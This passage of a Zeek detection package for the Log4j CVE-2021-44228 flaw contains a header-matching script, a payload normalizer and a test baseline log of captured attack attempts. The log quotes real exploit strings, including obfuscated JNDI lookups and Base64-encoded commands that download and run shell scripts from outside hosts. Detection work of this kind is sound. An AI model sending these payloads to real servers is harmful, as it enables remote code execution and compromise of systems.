| # Very general, FPs expected but we're casting a wide net intentionally. 81 | # Approach: 82 | # Match ${ 83 | # unless it's ${@ (php junk) 84 | # and only if it has a : in the middle and 85 | # and ending brace. 86 | # See test cases in zeek_init() for what we consider to be a TP/FP. 87 | global exploit_pattern: pattern = /\$\{[^@][^}]+:[^}]+\}/; 88 | 89 | # Stack used for `normalize`. Shouldn't be used outside of that function. 90 | global stack: vector of string; 91 | 92 | function peek(): string 93 | { 94 | if ( |stack| == 0 ) 95 | return ""; 96 | else 97 | return stack[|stack|-1]; 98 | } 99 | 100 | function pop(): string 101 | { 102 | if ( |stack| == 0 ) 103 | return ""; 104 | local x = peek(); 105 | stack = stack[0:|stack|-1]; 106 | return x; 107 | } 108 | 109 | function push(x: string) 110 | { 111 | stack += x; 112 | } 113 | 114 | function clear_stack() 115 | { 116 | stack = vector(); 117 | } 118 | 119 | # Attempts to normalize log4j payload to remove most common obfuscations. There 120 | # are effectively an infinite number of ways to do this, so don't expect it to 121 | # cover everything. See tests in `zeek_init()` to understand what it handles. 122 | # 123 | # Algorithm works as follows: 124 | # 125 | # "$" and "{" are pushed onto the stack when encountered. 126 | # Set a flag to show we have seen the first "$" "{" set. 127 | # If we are on our second+ set of "$" "{", start ignoring characters 128 | # If we see a ":" while ignoring, we have passed the function portion and should stop ignoring. 129 | # When we hit a "}", pop the previous "{" and "$" off the stack. If the stack is 130 | # now empty, this was the first instance (i.e., `${jdni...`) and it should be 131 | # preserved, otherwise, remove it. 132 | function normalize(payload: string): string 133 | { 134 | # Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j} 135 | payload = gsub(payload, /::\-/, ":"); 136 | local to_remove: set[count]; 137 | local i = 0; 138 | local ignoring = F; 139 | local saw_first = F; 140 | while ( i != |payload| ) 141 | { 142 | local c = payload[i]; 143 | switch ( c ) 144 | { 145 | case "$": 146 | push(c); 147 | break; 148 | case "{": 149 | if ( peek() == "$" ) 150 | push(c); 151 | if ( !saw_first ) 152 | { 153 | saw_first = T; 154 | } 155 | else 156 | { 157 | # Add previous "$" 158 | add to_remove[i-1]; 159 | ignoring = T; 160 | } 161 | break; 162 | case ":": 163 | if ( ignoring ) 164 | { 165 | add to_remove[i]; 166 | ignoring = F; 167 | } 168 | break; 169 | case "}": 170 | local open_brace = pop(); 171 | local dollar = pop(); 172 | # We only want to remove internal ones 173 | if ( dollar == "$" && open_brace == "{" && |stack| > 0 ) 174 | add to_remove[i]; 175 | break; 176 | } 177 | 178 | if ( ignoring ) 179 | add to_remove[i]; 180 | ++i; 181 | } 182 | 183 | local new_payload: vector of string; 184 | i = 0; 185 | while ( i != |payload| ) 186 | { 187 | if ( i !in to_remove ) 188 | new_payload += payload[i]; 189 | ++i; 190 | } 191 | clear_stack(); 192 | return join_string_vec(new_payload, ""); 193 | } 194 | 195 | # If split doesn't return the expected number of indices, return the default "-" 196 | function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string 197 | { 198 | local tmp = split_string1(s, p); 199 | if ( |tmp| > idx ) 200 | return tmp[idx]; 201 | else 202 | return missing; 203 | } 204 | 205 | # Assumes `name` or `value` string passed as `s` has the structure: 206 | # ${jdni:ldap://payload_host:payload_port/path} for the payload. Many examples 207 | # of more complicated obfuscation exist. If the structure is different, fill 208 | # missing fields with "-" so other structures in the wild can be explored in the 209 | # logs. For example, Binary Edge are using the following type of obfuscation: 210 | # ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}' 211 | function parse_payload(s: string): PayloadParts 212 | { 213 | if ( try_normalize ) 214 | s = normalize(s); 215 | local tmp = split_string(s, /\/\//); 216 | local last: string = "-"; 217 | if ( |tmp| > 0 ) 218 | last = tmp[(|tmp| - 1)]; 219 | local payload_uri = safe_split1_w_default(last, /\}/, 0); 220 | local payload_stem = safe_split1_w_default(payload_uri, /\//, 0); 221 | local payload_host = safe_split1_w_default(payload_stem, /\:/, 0); 222 | local payload_port = safe_split1_w_default(payload_stem, /\:/, 1); 223 | 224 | return PayloadParts($uri=payload_uri, $stem=payload_stem, $host=payload_host, $port_=payload_port); 225 | } 226 | 227 | event http_header(c: connection, is_orig: bool, name: string, value: string) 228 | { 229 | if ( c$id$orig_h in ignorable_orig_hosts ) 230 | return; 231 | if ( c$id$resp_h in ignorable_resp_hosts ) 232 | return; 233 | # Focus is mainly on client headers, but not filtering right now to explore interesting cases in the wild 234 | # if (!is_orig) 235 | # return; 236 | # Focus is mainly on value of header, but adding 'name' to explore what is being used in the wild 237 | local matched_name = exploit_pattern in name; 238 | local matched_value = exploit_pattern in value; 239 | local http_uri: string = ""; 240 | local http_method: string = ""; 241 | 242 | # Handle potentially missing fields 243 | if ( c$http?$uri ) 244 | http_uri = c$http$uri; 245 | if ( c$http?$method ) 246 | http_method = c$http$method; 247 | 248 | # Ignore matches that contain binary goop. This was a large contributor to 249 | # false positives. 250 | if ( matched_name && !is_ascii(name) ) 251 | return; 252 | if ( matched_value && !is_ascii(value) ) 253 | return; 254 | 255 | if ( !matched_name && !matched_value ) 256 | return; 257 | 258 | add c$http$tags[LOG4J_RCE]; 259 | 260 | local payload: PayloadParts; 261 | local info: Info; 262 | 263 | # TODO: add to a clusterized set for watching of subsequent traffic (LOG4J_SUCCESS notice). 264 | if ( matched_name ) 265 | { 266 | payload = parse_payload(name); 267 | if ( payload$host in ignorable_target_hosts ) 268 | return; 269 | info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value); 270 | NOTICE([$note=LOG4J_ATTEMPT_HEADER, 271 | $conn=c, 272 | $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)), 273 | # $suppress_for=3600sec, 274 | $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"), 275 | $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s', header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]); 276 | if ( log ) 277 | Log::write(LOG, info); 278 | } 279 | if ( matched_value ) 280 | { 281 | payload = parse_payload(value); 282 | if ( payload$host in ignorable_target_hosts ) 283 | return; 284 | info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value); 285 | NOTICE([$note=LOG4J_ATTEMPT_HEADER, 286 | $conn=c, 287 | $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)), 288 | # $suppress_for=3600sec, 289 | $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"), 290 | $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s', header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]); 291 | if ( log ) 292 | Log::write(LOG, info); 293 | } 294 | } 295 | 296 | event signature_match(state: signature_state, msg: string, data: string) 297 | { 298 | if ( !(msg == "log4j_javaclassname_udp" || msg == "log4j_javaclassname_tcp") ) 299 | return; 300 | 301 | NOTICE([$note=LOG4J_LDAP_JAVA, 302 | $conn=state$conn, 303 | $identifier=cat(state$conn$id$orig_h,state$conn$id$resp_h,state$conn$id$resp_p), 304 | # $suppress_for=3600sec, 305 | $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload."), 306 | $sub=data]); 307 | } 308 | 309 | event zeek_init() &priority=5 310 | { 311 | Log::create_stream(CVE_2021_44228::LOG, [$columns=Info, $path=log_path, $policy=log_policy]); 312 | } 313 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX Ce8sjQ1yXYbarn3Mv 45.137.21.9 38790 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==, payload_stem=45.137.21.9:1389, payload_host=45.137.21.9, payload_port=1389, method=POST, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}' 45.137.21.9 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX CWABgH2sHBQWCtrcji 161.35.155.230 36182 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=world80.log4j.binaryedge.io:80/callback, payload_stem=world80.log4j.binaryedge.io:80, payload_host=world80.log4j.binaryedge.io, payload_port=80, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}' 161.35.155.230 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX CJUPx43GdTZtHo6Kme 128.199.15.215 49114 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent, payload_stem=http80useragent.kryptoslogic-cve-2021-44228.com, payload_host=http80useragent.kryptoslogic-cve-2021-44228.com, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}' 128.199.15.215 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | XXXXXXXXXX.XXXXXX CTeHl91o8uGsNqqw3d 45.155.205.233 39692 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}', payload_uri=45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=, payload_stem=45.155.205.233:12344, payload_host=45.155.205.233, payload_port=12344, method=GET, is_orig=T, header name='USER-AGENT', header value='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}' 45.155.205.233 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 14 | XXXXXXXXXX.XXXXXX CTeHl91o8uGsNqqw3d 45.155.205.233 39692 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}', payload_uri=45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=, payload_stem=45.155.205.233:12344, payload_host=45.155.205.233, payload_port=12344, method=GET, is_orig=T, header name='REFERER', header value='${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}' 45.155.205.233 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 15 | XXXXXXXXXX.XXXXXX C3iNyP3r3txhrkusil 177.185.117.129 41810 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 16 | XXXXXXXXXX.XXXXXX CNqMer2JIgepG2LRIj 177.185.117.129 42022 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Oauth ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 17 | XXXXXXXXXX.XXXXXX CRD4FB4Mn942lBA8W4 177.185.117.129 42246 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Token ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 18 | XXXXXXXXXX.XXXXXX CUWDAG4qFmT1HEY77i 177.185.117.129 42452 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Basic ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 19 | XXXXXXXXXX.XXXXXX CqmznHcjLQcO8nK15 61.175.202.154 33476 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 20 | XXXXXXXXXX.XXXXXX CBS2ml4xq0Sr6BKUyh 61.175.202.154 33532 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Oauth ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 21 | XXXXXXXXXX.XXXXXX CTCORvVQk0WrEaVZe 61.175.202.154 33602 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Token ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 22 | XXXXXXXXXX.XXXXXX C10EIo4giI3Hr1NPr 61.175.202.154 33652 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Basic ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 23 | XXXXXXXXXX.XXXXXX Cb56ei397sP6ZSa0Ia 175.6.210.66 41090 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 24 | XXXXXXXXXX.XXXXXX C3lb3YcCzOtqhGWug 175.6.210.66 41158 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Oauth ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 25 | XXXXXXXXXX.XXXXXX CUgYdV2cQ5dBBKFfza 175.6.210.66 41240 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Token ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 26 | XXXXXXXXXX.XXXXXX C7lU5N1o9eBQpPLyg 175.6.210.66 41318 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Basic ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 27 | XXXXXXXXXX.XXXXXX Cly4EX21eC8Jvctww3 45.83.65.162 62270 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.65.162 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 28 | XXXXXXXXXX.XXXXXX Cly4EX21eC8Jvctww3 45.83.65.162 62270 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='REFERER', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.65.162 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 29 | XXXXXXXXXX.XXXXXX Cly4EX21eC8Jvctww3 45.83.65.162 62270 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='X-API-VERSION', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.65.162 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 30 | XXXXXXXXXX.XXXXXX CeGxig4pTexRZwJ5O2 45.83.64.151 59322 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.64.151 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 31 | XXXXXXXXXX.XXXXXX CeGxig4pTexRZwJ5O2 45.83.64.151 59322 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='REFERER', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.64.151 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 32 | XXXXXXXXXX.XXXXXX CeGxig4pTexRZwJ5O2 45.83.64.151 59322 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='X-API-VERSION', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.64.151 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 33 | XXXXXXXXXX.XXXXXX CEWnRj1IvZOkvf79T3 45.83.67.253 58996 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.67.253 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 34 | XXXXXXXXXX.XXXXXX CEWnRj1IvZOkvf79T3 45.83.67.253 58996 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='REFERER', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.67.253 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 35 | XXXXXXXXXX.XXXXXX CEWnRj1IvZOkvf79T3 45.83.67.253 58996 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='X-API-VERSION', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.67.253 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 36 | XXXXXXXXXX.XXXXXX COud3o1XUj0YCHj5Xh 46.166.139.111 54940 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=193.3.19.159:53/c, payload_stem=193.3.19.159:53, payload_host=193.3.19.159, payload_port=53, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://193.3.19.159:53/c}' 46.166.139.111 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 37 | #close XXXX-XX-XX-XX-XX-XX 38 | --------------------------------------------------------------------------------